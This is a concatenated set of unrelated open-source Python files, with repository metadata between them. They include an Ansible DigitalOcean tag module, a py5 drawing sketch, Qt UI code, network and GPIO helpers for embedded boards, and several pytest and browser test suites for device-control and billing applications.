tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: digital_ocean_tag_info
short_description: Gather information about DigitalOcean tags
description:
- This module can be used to gather information about DigitalOcean provided tags.
- This module was called C(digital_ocean_tag_facts) before Ansible 2.9. The usage did not change.
author: "Abhijeet Kasurde (@Akasurde)"
options:
tag_name:
description:
- Tag name that can be used to identify and reference a tag.
required: false
requirements:
- "python >= 2.6"
extends_documentation_fragment:
- community.general.digital_ocean.documentation
'''
EXAMPLES = '''
- name: Gather information about all tags
digital_ocean_tag_info:
oauth_token: "{{ oauth_token }}"
- name: Gather information about tag with given name
digital_ocean_tag_info:
oauth_token: "{{ oauth_token }}"
tag_name: "extra_awesome_tag"
- name: Get resources from tag name
digital_ocean_tag_info:
register: resp_out
- set_fact:
resources: "{{ item.resources }}"
loop: "{{ resp_out.data|json_query(name) }}"
vars:
name: "[?name=='extra_awesome_tag']"
- debug: var=resources
'''
RETURN = '''
data:
description: DigitalOcean tag information
returned: success
type: list
sample: [
{
"name": "extra-awesome",
"resources": {
"droplets": {
"count": 1,
...
}
}
},
]
'''
from traceback import format_exc
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.community.general.plugins.module_utils.digital_ocean import DigitalOceanHelper
from ansible.module_utils._text import to_native
def core(module):
tag_name = module.params.get('tag_name', None)
rest = DigitalOceanHelper(module)
base_url = 'tags?'
if tag_name is not None:
response = rest.get("%s/%s" % (base_url, tag_name))
status_code = response.status_code
if status_code != 200:
module.fail_json(msg="Failed to retrieve tags for DigitalOcean")
resp_json = response.json
tag = resp_json['tag']
else:
tag = rest.get_paginated_data(base_url=base_url, data_key_name='tags')
module.exit_json(changed=False, data=tag)
def main():
argument_spec = DigitalOceanHelper.digital_ocean_argument_spec()
argument_spec.update(
tag_name=dict(type='str', required=False),
)
module = AnsibleModule(argument_spec=argument_spec)
if module._name == 'digital_ocean_tag_facts':
module.deprecate("The 'digital_ocean_tag_facts' module has been renamed to 'digital_ocean_tag_info'", version='2.13')
try:
core(module)
except Exception as e:
module.fail_json(msg=to_native(e), exception=format_exc())
if __name__ == '__main__':
main()
| 26.786885 | 125 | 0.680233 |
d5f7a410dce6f7dd61b69a822bf1cf69f9d887fe
| 748 |
py
|
Python
|
rotating_triangles/rotating_triangle_final.py
|
kantel/py5
|
1bed40dbf732fce28412a206e7c043bd9a01a521
|
[
"MIT"
] | null | null | null |
rotating_triangles/rotating_triangle_final.py
|
kantel/py5
|
1bed40dbf732fce28412a206e7c043bd9a01a521
|
[
"MIT"
] | null | null | null |
rotating_triangles/rotating_triangle_final.py
|
kantel/py5
|
1bed40dbf732fce28412a206e7c043bd9a01a521
|
[
"MIT"
] | null | null | null |
# rotating triangles final
# after Roger Antonsen (University of Oslo)
# and Peter Farrell (Math Adventures with Python, p. 93ff.)
def setup():
size(600, 600)
color_mode(HSB, 100)
t = 0
def draw():
global t
background(255, 0, 100) # white
translate(width/2, height/2)
for i in range(90):
rotate(radians(360/90))
push_matrix()
translate(200, 0)
stroke(i%360, 100, 80)
rotate(radians(t + 2*i*360/90))
tri(100)
pop_matrix()
t += 0.5
def tri(length):
"""Zeichnet ein gleichseitiges Dreieck
rund um den Mittelpunkt des Dreiecks."""
no_fill()
triangle(0, -length,
-length*sqrt(3)/2, length/2,
length*sqrt(3)/2, length/2)
| 24.129032 | 59 | 0.586898 |
e6fb0d7160d5c560cbc70824225ce6917cdd2f82
| 4,965 |
py
|
Python
|
pyScript/ui/ui_script.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
pyScript/ui/ui_script.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
pyScript/ui/ui_script.py
|
Shirazbello/Pyscriptining
|
0f2c80a9bb10477d65966faeccc7783f20385c1b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'script.ui'
##
## Created by: Qt User Interface Compiler version 5.14.1
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import (QCoreApplication, QMetaObject, QObject, QPoint,
QRect, QSize, QUrl, Qt)
from PySide2.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont,
QFontDatabase, QIcon, QLinearGradient, QPalette, QPainter, QPixmap,
QRadialGradient)
from PySide2.QtWidgets import *
class Ui_script_widget(object):
def setupUi(self, script_widget):
if script_widget.objectName():
script_widget.setObjectName(u"script_widget")
script_widget.resize(1223, 876)
self.gridLayout = QGridLayout(script_widget)
self.gridLayout.setObjectName(u"gridLayout")
self.splitter_2 = QSplitter(script_widget)
self.splitter_2.setObjectName(u"splitter_2")
self.splitter_2.setOrientation(Qt.Horizontal)
self.splitter = QSplitter(self.splitter_2)
self.splitter.setObjectName(u"splitter")
self.splitter.setOrientation(Qt.Vertical)
self.log_groupBox = QGroupBox(self.splitter)
self.log_groupBox.setObjectName(u"log_groupBox")
self.gridLayout_2 = QGridLayout(self.log_groupBox)
self.gridLayout_2.setObjectName(u"gridLayout_2")
self.logs_scrollArea = QScrollArea(self.log_groupBox)
self.logs_scrollArea.setObjectName(u"logs_scrollArea")
self.logs_scrollArea.setWidgetResizable(True)
self.scrollAreaWidgetContents = QWidget()
self.scrollAreaWidgetContents.setObjectName(u"scrollAreaWidgetContents")
self.scrollAreaWidgetContents.setGeometry(QRect(0, 0, 140, 815))
self.logs_scrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout_2.addWidget(self.logs_scrollArea, 0, 0, 1, 1)
self.splitter.addWidget(self.log_groupBox)
self.splitter_2.addWidget(self.splitter)
self.contents_widget = QWidget(self.splitter_2)
self.contents_widget.setObjectName(u"contents_widget")
sizePolicy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.contents_widget.sizePolicy().hasHeightForWidth())
self.contents_widget.setSizePolicy(sizePolicy)
self.contents_widget.setMinimumSize(QSize(200, 0))
self.verticalLayout = QVBoxLayout(self.contents_widget)
self.verticalLayout.setObjectName(u"verticalLayout")
self.variables_group_box = QGroupBox(self.contents_widget)
self.variables_group_box.setObjectName(u"variables_group_box")
self.gridLayout_3 = QGridLayout(self.variables_group_box)
self.gridLayout_3.setObjectName(u"gridLayout_3")
self.variables_scrollArea = QScrollArea(self.variables_group_box)
self.variables_scrollArea.setObjectName(u"variables_scrollArea")
self.variables_scrollArea.setWidgetResizable(True)
self.scrollAreaWidgetContents_3 = QWidget()
self.scrollAreaWidgetContents_3.setObjectName(u"scrollAreaWidgetContents_3")
self.scrollAreaWidgetContents_3.setGeometry(QRect(0, 0, 991, 742))
self.variables_scrollArea.setWidget(self.scrollAreaWidgetContents_3)
self.gridLayout_3.addWidget(self.variables_scrollArea, 0, 0, 1, 1)
self.add_variable_push_button = QPushButton(self.variables_group_box)
self.add_variable_push_button.setObjectName(u"add_variable_push_button")
self.gridLayout_3.addWidget(self.add_variable_push_button, 2, 0, 1, 1)
self.new_var_name_lineEdit = QLineEdit(self.variables_group_box)
self.new_var_name_lineEdit.setObjectName(u"new_var_name_lineEdit")
self.gridLayout_3.addWidget(self.new_var_name_lineEdit, 1, 0, 1, 1)
self.verticalLayout.addWidget(self.variables_group_box)
self.splitter_2.addWidget(self.contents_widget)
self.gridLayout.addWidget(self.splitter_2, 0, 0, 1, 1)
self.retranslateUi(script_widget)
QMetaObject.connectSlotsByName(script_widget)
# setupUi
def retranslateUi(self, script_widget):
script_widget.setWindowTitle(QCoreApplication.translate("script_widget", u"Form", None))
self.log_groupBox.setTitle(QCoreApplication.translate("script_widget", u"Log", None))
self.variables_group_box.setTitle(QCoreApplication.translate("script_widget", u"Variables", None))
self.add_variable_push_button.setText(QCoreApplication.translate("script_widget", u"add", None))
self.new_var_name_lineEdit.setPlaceholderText(QCoreApplication.translate("script_widget", u"new var name", None))
# retranslateUi
| 48.203883 | 121 | 0.72004 |
5d99312bc166828cc24c9a9ef7023f8e8723ce7b
| 2,710 |
py
|
Python
|
src/tango_sdp_master/test/SDPMaster_test.py
|
rtobar/sdp-prototype
|
9f1527b884bf80daa509a7fe3722160c77260f4f
|
[
"BSD-3-Clause"
] | 2 |
2019-07-15T09:49:34.000Z
|
2019-10-14T16:04:17.000Z
|
src/tango_sdp_master/test/SDPMaster_test.py
|
rtobar/sdp-prototype
|
9f1527b884bf80daa509a7fe3722160c77260f4f
|
[
"BSD-3-Clause"
] | 17 |
2019-07-15T14:51:50.000Z
|
2021-06-02T00:29:43.000Z
|
src/tango_sdp_master/test/SDPMaster_test.py
|
ska-telescope/sdp-configuration-prototype
|
8c6cbda04a83b0e16987019406ed6ec7e1058a31
|
[
"BSD-3-Clause"
] | 1 |
2019-10-10T08:16:48.000Z
|
2019-10-10T08:16:48.000Z
|
# -*- coding: utf-8 -*-
"""Tests for the SDP Master Tango Class."""
# pylint: disable=redefined-outer-name, invalid-name
import pytest
from SDPMaster import SDPMaster
# Note:
#
# Since the device uses an inner thread, it is necessary to
# wait during the tests in order the let the device update itself.
# Hence, the sleep calls have to be secured enough not to produce
# any inconsistent behavior. However, the unittests need to run fast.
# Here, we use a factor 3 between the read period and the sleep calls.
#
# Look at devicetest examples for more advanced testing
# Device test case
@pytest.mark.usefixtures("tango_context")
class TestSDPMaster:
"""Test case for packet generation."""
# pylint: disable=, no-self-use,
# PROTECTED REGION ID(SDPMaster.test_additionnal_import) ENABLED START #
# PROTECTED REGION END # // SDPMaster.test_additionnal_import
device = SDPMaster
properties = {
'SkaLevel': '4',
'CentralLoggingTarget': '',
'ElementLoggingTarget': '',
'StorageLoggingTarget': 'localhost',
'GroupDefinitions': '',
'NrSubarrays': '16',
'CapabilityTypes': '',
'MaxCapabilities': ''
}
empty = None # Should be []
@classmethod
def mocking(cls):
"""Mock external libraries."""
# Example : Mock numpy
# cls.numpy = SDPMaster.numpy = MagicMock()
# PROTECTED REGION ID(SDPMaster.test_mocking) ENABLED START #
# PROTECTED REGION END # // SDPMaster.test_mocking
def test_operating_state(self, tango_context):
"""Test for Operating State."""
# PROTECTED REGION ID(SDPMaster.test_OperatingState) ENABLED START #
assert tango_context.device.OperatingState == 0
# PROTECTED REGION END # // SDPMaster.test_OperatingState
def test_on_state(self, tango_context):
"""Test for ON State."""
tango_context.device.on()
assert tango_context.device.OperatingState == 1
def test_standby_state(self, tango_context):
"""Test for STANDBY State."""
tango_context.device.standby()
assert tango_context.device.OperatingState == 3
def test_disable_state(self, tango_context):
"""Test for DISABLE State."""
tango_context.device.disable()
assert tango_context.device.OperatingState == 2
def test_off_state(self, tango_context):
"""Test for OFF State."""
tango_context.device.off()
assert tango_context.device.OperatingState == 6
def test_health_state(self, tango_context):
"""Test for healthState."""
device = tango_context.device
device.init()
assert device.healthState == 0
| 33.04878 | 76 | 0.663469 |
53988bbc9921c847928ac8a83642732eb22567cb
| 3,711 |
py
|
Python
|
components/py_engine/framework/network.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | 4,538 |
2017-10-20T05:19:03.000Z
|
2022-03-30T02:29:30.000Z
|
components/py_engine/framework/network.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | 1,088 |
2017-10-21T07:57:22.000Z
|
2022-03-31T08:15:49.000Z
|
components/py_engine/framework/network.py
|
willianchanlovegithub/AliOS-Things
|
637c0802cab667b872d3b97a121e18c66f256eab
|
[
"Apache-2.0"
] | 1,860 |
2017-10-20T05:22:35.000Z
|
2022-03-27T10:54:14.000Z
|
# -*- coding: UTF-8 -*-
import netmgr as nm
import time
_wifi_connected = False
def singleton(cls, *args, **kw):
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls(*args, **kw)
nm.init()
return instances[cls]
return getinstance
def _on_wifi_cb(data):
print('Get Wifi CallBack for wifi.py')
_wifi_connected = True
@singleton
class NetWorkClient:
"""
    This module implements network-management related functionality, including
    initialisation, connecting to a network, and status information.
"""
global _on_wifi_cb
def __init__(self):
nm.register_call_back(1,_on_wifi_cb)
def __str_is_empty(self,value):
if value is None or value == "":
return True
else:
return False
def connect(self,data):
"""
        Connect to a network.
        :param data(dict): the keys of ``data`` are described below
        .. list-table::
            * - Attribute
              - Type
              - Required
              - Description
            * - ssid
              - string
              - required
              - name of the Wi-Fi access point to connect to
            * - password
              - string
              - required
              - password of the Wi-Fi network
        Usage example::
# -*- coding: UTF-8 -*-
import network
net = network.NetWorkClient()
net.connect({
'ssid' : 'KIDS' ,
'password' : '12345678'
}
)
"""
global _wifi_cb
if isinstance(data, dict):
pass
else:
raise ValueError("connect func param must be dict")
if not 'ssid' in data:
raise ValueError('connect : param must have key "ssid"')
elif self.__str_is_empty(data['ssid']):
raise ValueError("ssid wrong")
if not 'password' in data:
raise ValueError('connect : param must have key "password"')
elif self.__str_is_empty(data['password']):
raise ValueError("password wrong")
return nm.connect(data['ssid'],data['password'])
def disconnect(self):
"""
        Disconnect from the network.
"""
nm.disconnect()
def getType(self):
"""
        Get the current network type.
        :param: None
        :returns:
        .. list-table::
            * - Return value
              - Network type
            * - 0
              - WIFI
            * - 1
              - Cellular network
            * - 2
              - Ethernet
            * - 3
              - Unknown network
"""
return nm.getType()
def getStatus(self):
"""
        Get the current network status.
        :param: None
        :returns:
        .. list-table::
            * - Return value
              - Connection status
            * - 0
              - Disconnecting
            * - 1
              - Disconnected
            * - 2
              - Connecting
            * - 3
              - Connected
            * - 4
              - Obtaining IP
            * - 5
              - IP obtained
            * - 6
              - Connection failed
            * - 7
              - Unknown state
              - ``True`` connected
              - ``False`` not connected
"""
return nm.getStatus()
def getInfo(self):
"""
        Get information about the current network.
        :param: None
        :returns: a dict with the keys described below
        .. list-table::
            * - Key
              - Value type
            * - SSID
              - string
            * - IP
              - string
            * - MAC
              - string
            * - RSSI
              - int
"""
return nm.getInfo()
def on(self,id,func):
nm.register_call_back(1,func)
| 20.059459 | 72 | 0.371598 |
072b710f034936f9467275f81306c723e9738455
| 1,968 |
py
|
Python
|
src/Sephrasto/DatenbankSelectTypeWrapper.py
|
qeqar/Sephrasto
|
ce46d46299b2c793f015e25c98908773c39b1dee
|
[
"MIT"
] | 1 |
2022-02-02T16:15:59.000Z
|
2022-02-02T16:15:59.000Z
|
src/Sephrasto/DatenbankSelectTypeWrapper.py
|
qeqar/Sephrasto
|
ce46d46299b2c793f015e25c98908773c39b1dee
|
[
"MIT"
] | 1 |
2022-01-14T11:04:19.000Z
|
2022-01-14T11:04:19.000Z
|
src/Sephrasto/DatenbankSelectTypeWrapper.py
|
qeqar/Sephrasto
|
ce46d46299b2c793f015e25c98908773c39b1dee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 18 10:33:39 2017
@author: Aeolitus
"""
from PyQt5 import QtWidgets, QtCore
import UI.DatenbankSelectType
class DatenbankSelectTypeWrapper(object):
def __init__(self, dbTypes):
super().__init__()
Dialog = QtWidgets.QDialog()
ui = UI.DatenbankSelectType.Ui_Dialog()
ui.setupUi(Dialog)
# Todo: Should probably just rename them properly but it would require a db migration...
displayNames = {
"Manöver / Modifikation" : "Manöver / Modifikation / Regel",
"Fertigkeit" : "Fertigkeit (profan)",
"Übernatürliche Fertigkeit" : "Fertigkeit (übernatürlich)"
}
displayNames_inverse = {v: k for k, v in displayNames.items()}
types = []
for dbType in sorted(dbTypes):
if dbType == "Einstellung":
continue
if dbType in displayNames:
types.append(displayNames[dbType])
else:
types.append(dbType)
types = sorted(types)
buttons = []
for dbType in types:
button = QtWidgets.QRadioButton()
button.setText(dbType)
buttons.append(button)
ui.buttonLayout.addWidget(button)
buttons[0].setChecked(True)
Dialog.setWindowFlags(
QtCore.Qt.Window |
QtCore.Qt.CustomizeWindowHint |
QtCore.Qt.WindowTitleHint |
QtCore.Qt.WindowCloseButtonHint)
Dialog.show()
ret = Dialog.exec_()
self.entryType = None
if ret == QtWidgets.QDialog.Accepted:
for button in buttons:
if button.isChecked():
self.entryType = button.text()
if self.entryType in displayNames_inverse:
self.entryType = displayNames_inverse[self.entryType]
break
| 32.262295 | 96 | 0.560976 |
ab0730df111959f7252ac7af32617831e590cef5
| 4,013 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_interface.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_interface.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_interface.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# (c) 2019 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.cloudengine import ce_is_is_interface
from ansible_collections.community.general.tests.unit.modules.network.cloudengine.ce_module import TestCloudEngineModule, load_fixture
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
class TestCloudEngineLacpModule(TestCloudEngineModule):
module = ce_is_is_interface
def setUp(self):
super(TestCloudEngineLacpModule, self).setUp()
self.mock_get_config = patch('ansible_collections.community.general.plugins.modules.network.cloudengine.ce_is_is_interface.get_nc_config')
self.get_nc_config = self.mock_get_config.start()
self.mock_set_config = patch('ansible_collections.community.general.plugins.modules.network.cloudengine.ce_is_is_interface.set_nc_config')
self.set_nc_config = self.mock_set_config.start()
self.set_nc_config.return_value = None
self.before = load_fixture('ce_is_is_interface', 'before_interface.txt')
self.after = load_fixture('ce_is_is_interface', 'after_interface.txt')
def tearDown(self):
super(TestCloudEngineLacpModule, self).tearDown()
self.mock_set_config.stop()
self.mock_get_config.stop()
def test_isis_interface_present(self):
update = ['interface 10GE1/0/1',
'isis enable 100',
'isis circuit-level level-1',
'isis dis-priority 10 level-1',
'isis ppp-negotiation 2-way',
'isis cost 10 level-2']
self.get_nc_config.side_effect = (self.before, self.after)
config = dict(
instance_id=100,
ifname='10GE1/0/1',
leveltype='level_1',
level1dispriority=10,
silentenable=True,
silentcost=True,
typep2penable=True,
snpacheck=True,
p2pnegotiationmode='2_way',
p2ppeeripignore=True,
ppposicpcheckenable=True,
level2cost=10
)
set_module_args(config)
result = self.execute_module(changed=True)
print(result['updates'])
        self.assertEqual(sorted(result['updates']), sorted(update))
def test_isis_interface_absent(self):
update = ['interface 10GE1/0/1',
'undo isis enable',
'undo isis circuit-level',
'undo isis ppp-negotiation']
self.get_nc_config.side_effect = (self.after, self.before)
config = dict(
instance_id=100,
ifname='10GE1/0/1',
leveltype='level_1',
level1dispriority=10,
silentenable=True,
silentcost=True,
typep2penable=True,
snpacheck=True,
p2pnegotiationmode='2_way',
p2ppeeripignore=True,
ppposicpcheckenable=True,
level2cost=10,
state='absent'
)
set_module_args(config)
result = self.execute_module(changed=True)
        self.assertEqual(sorted(result['updates']), sorted(update))
| 39.732673 | 146 | 0.670072 |
ab438c98c3b4693f9c5289b5b22cd176e44fcdd3
| 2,639 |
py
|
Python
|
03 Python/Smart Home Dashboard/aufgabe/hwio/switch.py
|
DennisSchulmeister/dhbwka-wwi-iottech-quellcodes
|
58f86907af31187f267a9ea476f061cc59098ebd
|
[
"CC-BY-4.0"
] | null | null | null |
03 Python/Smart Home Dashboard/aufgabe/hwio/switch.py
|
DennisSchulmeister/dhbwka-wwi-iottech-quellcodes
|
58f86907af31187f267a9ea476f061cc59098ebd
|
[
"CC-BY-4.0"
] | null | null | null |
03 Python/Smart Home Dashboard/aufgabe/hwio/switch.py
|
DennisSchulmeister/dhbwka-wwi-iottech-quellcodes
|
58f86907af31187f267a9ea476f061cc59098ebd
|
[
"CC-BY-4.0"
] | 1 |
2020-10-10T20:24:05.000Z
|
2020-10-10T20:24:05.000Z
|
import time
import RPi.GPIO as GPIO
from .hwdevice import HardwareDevice
class SwitchOutputDevice(HardwareDevice):
"""
    Class for driving a simple, binary GPIO output. The output can be used to
    switch an LED or any other load (e.g. a relay) on or off. In addition, the
    output can be toggled on and off automatically at regular intervals, for
    example to make an LED blink.
"""
STATE_OFF = 0
STATE_ON = 1
STATE_BLINK = 2
def __init__(self, gpio_pin):
"""
        Constructor.
        @param gpio_pin: pin number of the LED
"""
        # TODO: initialize the GPIO pin
self._gpio_pin = gpio_pin
self._state = self.STATE_OFF
self._blink_sec = 0
self._last_blink = 0
self._blink_on = False
self._need_update = False
def switch_on(self, on):
"""
        Switches the output on or off.
        @param on: True if the output should be switched on
"""
self._need_update = True
if on:
self._state = self.STATE_ON
else:
self._state = self.STATE_OFF
def blink(self, blink_sec):
"""
        Toggles the output on and off periodically.
        @param blink_sec: number of seconds between switching operations
"""
self._state = self.STATE_BLINK
        self._blink_sec = blink_sec
self._last_blink = 0
def tick(self):
"""
        Main method in which the output is actually switched.
"""
if self._state == self.STATE_ON and self._need_update:
self._output(True)
elif self._state == self.STATE_OFF and self._need_update:
self._output(False)
elif self._state == self.STATE_BLINK:
now = time.perf_counter()
elapsed_sec = now - self._last_blink
if elapsed_sec >= self._blink_sec:
self._last_blink = now
self._blink_on = not self._blink_on
self._output(self._blink_on)
self._need_update = False
def close(self):
"""
        Shuts down the hardware access.
"""
self._state = self.STATE_OFF
self._output(False)
def _output(self, value):
"""
        Helper method for switching the GPIO output on or off. The switching
        operation is additionally logged to the console.
"""
value_text = "An" if value else "Aus"
print("GPIO %s: %s" % (self._gpio_pin, value_text))
        # TODO: set the GPIO pin
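if __name__ == "__main__":
    # Illustrative sketch, not part of the original module: let an output on a
    # hypothetical pin 18 blink once per second for ten seconds. The pin number
    # and timings are assumptions made for this example only.
    led = SwitchOutputDevice(18)
    led.blink(1.0)
    t_end = time.perf_counter() + 10
    while time.perf_counter() < t_end:
        led.tick()
        time.sleep(0.01)
    led.close()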
| 29.651685 | 79 | 0.605532 |
db3b848cb3dd5ee95ffcd7e58640e33e842abc8e
| 9,547 |
py
|
Python
|
tests/onegov/feriennet/test_browser.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/feriennet/test_browser.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/feriennet/test_browser.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import time
from psycopg2.extras import NumericRange
from pytest import mark
@mark.flaky(reruns=3)
def test_browse_matching(browser, scenario):
scenario.add_period(title="Ferienpass 2016")
for i in range(2):
scenario.add_activity(title=f"A {i}", state='accepted')
scenario.add_occasion(age=(0, 10), spots=(2, 4))
dustin = scenario.add_attendee(name="Dustin")
mike = scenario.add_attendee(name="Mike")
# the first course has enough attendees
scenario.add_booking(attendee=dustin, occasion=scenario.occasions[0])
scenario.add_booking(attendee=mike, occasion=scenario.occasions[0])
# the second one does not
scenario.add_booking(attendee=mike, occasion=scenario.occasions[1])
scenario.commit()
browser.login_admin()
browser.visit('/matching')
# check the initial state
assert browser.is_text_present("Ferienpass 2016")
assert browser.is_text_present("Zufriedenheit liegt bei 0%")
assert browser.is_text_present("0% aller Durchführungen haben genug")
assert browser.is_text_present("0 / 4")
# run a matching
browser.find_by_value("Zuteilung ausführen").click()
# check the results
assert browser.is_text_present("Zufriedenheit liegt bei 100%")
assert browser.is_text_present("50% aller Durchführungen haben genug")
assert browser.is_text_present("1 / 4")
assert browser.is_text_present("2 / 4")
# try to toggle some details
assert not browser.is_text_present("Dustin")
assert not browser.is_text_present("Mike")
browser.find_by_css('.matching-details > button')[0].click()
browser.is_element_visible_by_css('.matches')
assert browser.is_text_present("Dustin")
assert browser.is_text_present("Mike")
# reset it again
browser.find_by_css('.reset-matching').click()
# without this we sometimes get errors
time.sleep(0.25)
# confirm the matching
assert browser.is_text_present("Zufriedenheit liegt bei 0%")
assert browser.is_text_present("0% aller Durchführungen haben genug")
browser.find_by_css('input[value="yes"]').click()
browser.find_by_css('input[name="sure"]').click()
browser.find_by_value("Zuteilung ausführen").click()
assert browser.is_text_present("wurde bereits bestätigt")
# verify the period's state
browser.visit('/periods')
assert 'finished prebooking' in browser.html
@mark.flaky(reruns=3)
def test_browse_billing(browser, scenario, postgres):
scenario.add_period(title="Ferienpass 2016", confirmed=True)
scenario.add_activity(title="Foobar", state='accepted')
scenario.add_user(username='[email protected]', role='member')
scenario.c.users.by_username('[email protected]').realname = 'Jane Doe'
scenario.c.users.by_username('[email protected]').realname = 'John Doe'
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=100)
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=1000)
scenario.add_attendee(name="Dustin")
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[1],
state='cancelled',
cost=1000
)
scenario.add_attendee(name="Mike")
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[1],
state='accepted',
cost=1000
)
scenario.commit()
admin = browser
member = browser.clone()
admin.login_admin()
member.login('[email protected]', 'hunter2')
# initially there are no bills
admin.visit('/billing')
assert admin.is_text_present("Keine Rechnungen gefunden")
# they can be created
admin.find_by_css("input[type='submit']").click()
assert admin.is_text_present("John Doe")
assert admin.is_text_present("Jane Doe")
# as long as the period is not finalized, there's no way to pay
admin.visit('/[email protected]')
assert admin.is_text_present('100.00 Ausstehend')
admin.visit('/[email protected]')
assert admin.is_text_present('1100.00 Ausstehend')
assert 'mark-paid' not in admin.html
# as long as the period is not finalized, there are no invoices
for client in (member, admin):
client.visit('/')
assert client.find_by_css('.invoices-count').first['data-count'] == '0'
client.visit('/my-bills')
assert client.is_text_present("noch keine Rechnungen")
# once the period is finalized, the invoices become public and they
# may be marked as paid
admin.visit('/billing')
admin.find_by_css('input[value="yes"]').click()
admin.find_by_css('input[name="sure"]').click()
admin.find_by_css("input[type='submit']").click()
for client in (member, admin):
client.visit('/')
assert client.find_by_css('.invoices-count').first['data-count'] == '1'
client.visit('/my-bills')
assert not client.is_text_present('noch keine Rechnungen')
assert client.is_text_present("Ferienpass 2016")
admin.visit('/[email protected]&state=all')
assert client.is_text_present('1100.00 Ausstehend')
# we'll test a few scenarios here
postgres.save()
# pay the bill bit by bit
assert not admin.is_element_present_by_css('.paid')
admin.find_by_css('.bill button').click()
admin.find_by_css('table .unpaid .actions-button').first.click()
admin.find_by_css('table .unpaid .mark-paid').first.click()
time.sleep(0.25)
assert admin.is_element_present_by_css('.paid')
assert admin.is_element_present_by_css('.unpaid')
admin.find_by_css('table .unpaid .actions-button').first.click()
admin.find_by_css('table .unpaid .mark-paid').first.click()
time.sleep(0.25)
assert admin.is_element_present_by_css('.paid')
assert not admin.is_element_present_by_css('.unpaid')
# try to introduce a manual booking
postgres.undo()
admin.visit('/billing?state=all')
admin.find_by_css('.dropdown.right-side').click()
admin.find_by_css('.new-booking').click()
admin.choose('target', 'all')
admin.choose('kind', 'discount')
admin.find_by_css('#booking_text').fill('Rabatt')
admin.find_by_css('#discount').fill('1.00')
admin.find_by_value("Absenden").click()
assert admin.is_text_present("2 manuelle Buchungen wurden erstellt")
assert admin.is_element_present_by_css('.remove-manual')
# remove the manual booking
admin.find_by_css('.dropdown.right-side').click()
admin.find_by_css('.remove-manual').click()
assert admin.is_text_present("2 Buchungen entfernen")
admin.find_by_text("2 Buchungen entfernen").click()
time.sleep(0.25)
assert not admin.is_element_present_by_css('.remove-manual')
def test_volunteers(browser, scenario):
scenario.add_period(title="Ferienpass 2019", active=True, confirmed=True)
scenario.add_activity(title="Zoo", state='accepted')
scenario.add_user(username='[email protected]', role='member')
scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=100)
scenario.add_need(
name="Begleiter", number=NumericRange(1, 4), accept_signups=True)
scenario.add_attendee(name="Dustin")
scenario.add_booking(
username='[email protected]',
occasion=scenario.occasions[0],
state='accepted',
cost=100
)
scenario.commit()
